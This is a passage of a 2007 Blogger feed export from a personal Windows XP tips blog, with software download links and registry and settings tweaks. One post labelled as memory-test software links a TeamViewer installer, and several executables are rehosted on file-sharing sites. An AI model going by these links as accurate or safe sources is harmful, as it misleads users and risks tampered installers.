src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3589827099976089556</id><published>2007-10-31T15:52:00.000+11:00</published><updated>2007-10-31T15:53:31.202+11:00</updated><title type='text'>BitDefender Total Security 2008</title><content type='html'>BitDefender Total Security 2008 - the Ultimate Proactive Protection for Your PCs BitDefender®&lt;br /&gt;&lt;a href="http://www.9down.com/BitDefender-AntiVirus-Internet-Security-Total-Security-2008-v11-0-13-Final-18841/"&gt;http://www.9down.com/BitDefender-AntiVirus-Internet-Security-Total-Security-2008-v11-0-13-Final-18841/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3589827099976089556?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3589827099976089556/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3589827099976089556&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3589827099976089556'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3589827099976089556'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/bitdefender-total-security-2008.html' title='BitDefender Total Security 2008'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-1731954263951249841</id><published>2007-10-30T20:19:00.000+11:00</published><updated>2007-10-30T20:20:56.835+11:00</updated><title type='text'>Virtual CloneDrive 5.2.0.2 Beta</title><content type='html'>Virtual CloneDrive 5.2.0.2 Beta&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/66208845/SetupVirtualCloneDrive5202.exe"&gt;http://rapidshare.com/files/66208845/SetupVirtualCloneDrive5202.exe&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-1731954263951249841?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/1731954263951249841/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=1731954263951249841&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1731954263951249841'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1731954263951249841'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/virtual-clonedrive-5202-beta.html' title='Virtual CloneDrive 5.2.0.2 Beta'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-1018688707376033489</id><published>2007-10-30T20:15:00.000+11:00</published><updated>2007-10-30T20:18:11.142+11:00</updated><title type='text'>Microsoft Private Folder tools</title><content type='html'>Microsoft Private Folder is a useful tool for you to protect your private data when your friends, colleagues, kids or other people share your PC or account. With this tool, you will get one password protected folder called 'My Private Folder' in your account to save your personal files. Download and have your private folder today:&lt;br /&gt;&lt;a href="http://rapidshare.com/files/66208380/Microsoft_Private_Folder.msi"&gt;http://rapidshare.com/files/66208380/Microsoft_Private_Folder.msi&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-1018688707376033489?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/1018688707376033489/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=1018688707376033489&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1018688707376033489'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1018688707376033489'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/microsoft-private-folder-tools.html' title='Microsoft Private Folder tools'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-9096077493730641683</id><published>2007-10-30T20:11:00.000+11:00</published><updated>2007-10-30T20:13:18.993+11:00</updated><title type='text'>Memory Test And Check Sotfware</title><content type='html'>Memory Test And Check Sotfware&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/65024759/TeamViewer_Setup.exe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-9096077493730641683?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/9096077493730641683/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=9096077493730641683&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/9096077493730641683'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/9096077493730641683'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/memory-test-and-check-sotfware.html' title='Memory Test And Check Sotfware'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-601530005077815338</id><published>2007-10-26T09:03:00.001+10:00</published><updated>2007-10-26T09:03:27.137+10:00</updated><title type='text'>PHP.Pocket.Reference.2nd.Edition</title><content type='html'>PHP.Pocket.Reference.2nd.Edition&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-601530005077815338?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/601530005077815338/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=601530005077815338&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/601530005077815338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/601530005077815338'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/phppocketreference2ndedition.html' title='PHP.Pocket.Reference.2nd.Edition'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6551233506456983863</id><published>2007-10-26T08:59:00.000+10:00</published><updated>2007-10-26T09:00:40.808+10:00</updated><title type='text'>client program for the SSH, Telnet and Rlogin network protocols</title><content type='html'>Putty.exe&lt;br /&gt;&lt;br /&gt;PuTTY is a client program for the SSH, Telnet and Rlogin network protocols.&lt;br /&gt;Click here for download :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html"&gt;http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6551233506456983863?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6551233506456983863/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6551233506456983863&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6551233506456983863'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6551233506456983863'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/client-program-for-ssh-telnet-and.html' title='client program for the SSH, Telnet and Rlogin network protocols'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8695888460199143731</id><published>2007-10-26T08:57:00.001+10:00</published><updated>2007-10-26T08:57:44.855+10:00</updated><title type='text'>AVG Anti Rootkit Free Download</title><content type='html'>AVG Anti Rootkit Free Download&lt;br /&gt;&lt;br /&gt;Click here :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.grisoft.com/doc/5390/us/frt/0"&gt;http://free.grisoft.com/doc/5390/us/frt/0&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8695888460199143731?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8695888460199143731/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8695888460199143731&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8695888460199143731'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8695888460199143731'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/avg-anti-rootkit-free-download.html' title='AVG Anti Rootkit Free Download'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-1528567726915973523</id><published>2007-10-26T08:55:00.000+10:00</published><updated>2007-10-26T08:56:38.966+10:00</updated><title type='text'>AVG Anti Spyware 7.5 free download</title><content type='html'>AVG Anti Spyware 7.5 free download&lt;br /&gt;&lt;br /&gt;Click here :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.grisoft.com/doc/5390/us/frt/0"&gt;http://free.grisoft.com/doc/5390/us/frt/0&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-1528567726915973523?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/1528567726915973523/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=1528567726915973523&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1528567726915973523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1528567726915973523'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/avg-anti-spyware-75-free-download.html' title='AVG Anti Spyware 7.5 free download'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6674647921252478996</id><published>2007-10-26T08:54:00.000+10:00</published><updated>2007-10-26T08:55:29.505+10:00</updated><title type='text'>AVG Anti Virus Free Edition</title><content type='html'>AVG Anti Virus Free Edition : Click here&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.grisoft.com/doc/5390/us/frt/0"&gt;http://free.grisoft.com/doc/5390/us/frt/0&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6674647921252478996?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6674647921252478996/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6674647921252478996&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6674647921252478996'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6674647921252478996'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/avg-anti-virus-free-edition.html' title='AVG Anti Virus Free Edition'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-7473051727022631299</id><published>2007-10-25T18:09:00.000+10:00</published><updated>2007-10-25T21:34:35.783+10:00</updated><title type='text'>Remote Desktop connection Software</title><content type='html'>Easy way to connect remotely from any ware. just three steps away :&lt;br /&gt;1 Download sofware&lt;br /&gt;2 Install it&lt;br /&gt;3 send this link to the other person whom you wnat to connect and ask them to install and give you a password.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/65024759/TeamViewer_Setup.exe"&gt;http://rapidshare.com/files/65024759/TeamViewer_Setup.exe&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-7473051727022631299?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/7473051727022631299/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=7473051727022631299&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7473051727022631299'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7473051727022631299'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/remote-desktop-connection-software.html' title='Remote Desktop connection Software'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6357333898835504476</id><published>2007-10-02T00:28:00.000+10:00</published><updated>2007-10-02T00:29:35.682+10:00</updated><title type='text'>automatic logon for Windows XP Home Edition or Windows XP Professional</title><content type='html'>I  &gt; Start / Run / control userpasswords2 / OK.&lt;br /&gt;II &gt; On the Users tab, clear the Users must enter a user name and password to use &lt;br /&gt;     this computer box.&lt;br /&gt;III&gt;Press Apply and OK.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6357333898835504476?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6357333898835504476/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6357333898835504476&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6357333898835504476'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6357333898835504476'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/automatic-logon-for-windows-xp-home.html' title='automatic logon for Windows XP Home Edition or Windows XP Professional'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4604992233740264780</id><published>2007-10-02T00:13:00.002+10:00</published><updated>2007-10-02T00:27:01.604+10:00</updated><title type='text'>Disable the Windows XP Tool Tips</title><content type='html'>I  &gt; Copy / Paste the following to a NoTT.reg file:&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]&lt;br /&gt;"ShowInfoTip"=dword:00000000&lt;br /&gt;&lt;br /&gt;II  &gt; Merge the NoTT.reg file with the registry or run regedit /s NoTT.reg.&lt;br /&gt;&lt;br /&gt;III&gt;The use must log off and on for this setting to take effect.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4604992233740264780?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4604992233740264780/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4604992233740264780&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4604992233740264780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4604992233740264780'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/disable-windows-xp-tool-tips.html' title='Disable the Windows XP Tool Tips'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8254623864464423391</id><published>2007-10-02T00:13:00.001+10:00</published><updated>2007-10-02T00:13:36.004+10:00</updated><title type='text'>Force Explorer to display an open with choice</title><content type='html'>If a file with a known extension is right clicked, you are offered a choice to open the file. If you wish to open this file with a different program, highlight the file, and press Shift + Right Click and choose open with. You can permanently change the association by checking the "always open with this program" check box.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8254623864464423391?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8254623864464423391/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8254623864464423391&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8254623864464423391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8254623864464423391'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/force-explorer-to-display-open-with.html' title='Force Explorer to display an open with choice'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-1846477895993882787</id><published>2007-10-01T23:45:00.000+10:00</published><updated>2007-10-01T23:47:41.426+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Automatically close non-responsive programs</title><content type='html'>With a small registry tweak, Windows XP can be set to automatically close any program that 'stops responding' (crashes), eliminating the need for you to use the task manager to close down the offending software manually. &lt;br /&gt;&lt;br /&gt;To do this: &lt;br /&gt;&lt;br /&gt;Open REGEDIT and navigate to HKEY_CURRENT_USER\Control Panel\ Desktop &lt;br /&gt;&lt;br /&gt;Modify the REG_SZ entry AutoEndTasks with a value of 1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-1846477895993882787?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/1846477895993882787/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=1846477895993882787&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1846477895993882787'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1846477895993882787'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/automatically-close-non-responsive.html' title='Automatically close non-responsive programs'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-941668479541891407</id><published>2007-10-01T23:44:00.000+10:00</published><updated>2007-10-01T23:50:51.551+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hard Disk OR Drivers'/><title type='text'>Set monitor refresh rate</title><content type='html'>Every monitor has a maximum refresh rate it is capable of displaying at a given resolution (for example, a typical 17-inch monitor of a few years ago will happily crank out 85Hz or more at a resolution of 800x600, but may only be capable of 60Hz at 1600x1200). &lt;br /&gt;&lt;br /&gt;If this refresh rate is exceeded, the image will be distorted and unusable. &lt;br /&gt;&lt;br /&gt;Older CRT monitors, especially 15-inch or smaller ones, tend not to be capable of a refresh rate much over 60Hz, especially at resolutions greater than 640X480. Also, setting the refresh rate does not have the same effect on LCD or flat panel monitors, as their screens are not redrawn in the same way. &lt;br /&gt;&lt;br /&gt;To change your monitor refresh rate: Right click on an empty space on your desktop (no icons) and select 'properties.' Click the 'settings' tab and choose the 'advanced' button. Now choose the 'adaptor' tab and click the 'show all modes' button. &lt;br /&gt;&lt;br /&gt;This presents you with a list of resolution, colour and refresh rate options that your video card\monitor combination is capable of displaying. You can experiment with these settings by using the 'apply' button. Note that a refresh rate of 75Hz or above is generally recommended, (keep in mind most monitors do not support settings higher than 85Hz). &lt;br /&gt;&lt;br /&gt;After you set the refresh rate, you may feel a little uncomfortable for a short while as your eyes adjust, but rest assured you will grow to appreciate the difference in ease of viewing.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-941668479541891407?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/941668479541891407/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=941668479541891407&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/941668479541891407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/941668479541891407'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/set-monitor-refresh-rate.html' title='Set monitor refresh rate'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-7632841227688565140</id><published>2007-10-01T23:43:00.000+10:00</published><updated>2007-10-01T23:47:41.426+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>system restore when you कैन not boot your system</title><content type='html'>If your system has failed to the point where you cannot access the Windows GUI either through booting normally or through safe mode, you may still have the chance to use the System Restore feature if you have it enabled, by running it form the command prompt. To do this: &lt;br /&gt;&lt;br /&gt;Restart your computer and press F8 after the POST screen to bring up the Windows XP boot menu. Choose 'boot in safe mode with command prompt.' &lt;br /&gt;&lt;br /&gt;If your system gets to the command prompt successfully, type '%systemroot%\system32\restore\rstrui.exe' and then press enter. Follow the onscreen instructions to restore your computer to a previous saved point.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-7632841227688565140?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/7632841227688565140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=7632841227688565140&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7632841227688565140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7632841227688565140'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/system-restore-when-you-not-boot-your.html' title='system restore when you कैन not boot your system'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-5451522565776175340</id><published>2007-10-01T23:42:00.000+10:00</published><updated>2007-10-01T23:47:41.426+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Hosting online games through the Windows XP firewall</title><content type='html'>If you are using the Windows XP firewall and you wish to host an online game such as Quake 3, or other applications that require users on the Internet to contact your computer directly, you will need to customize your firewall slightly to allow these specific communications through. Fortunately the XP firewall makes these changes fairly easy to do. &lt;br /&gt;&lt;br /&gt;To customize your firewall: Go to 'start\control panel\network connections'. Right click on the network connection that has the firewall enabled and go to 'properties.' Choose the 'settings' button at the bottom. On the 'services' tab, 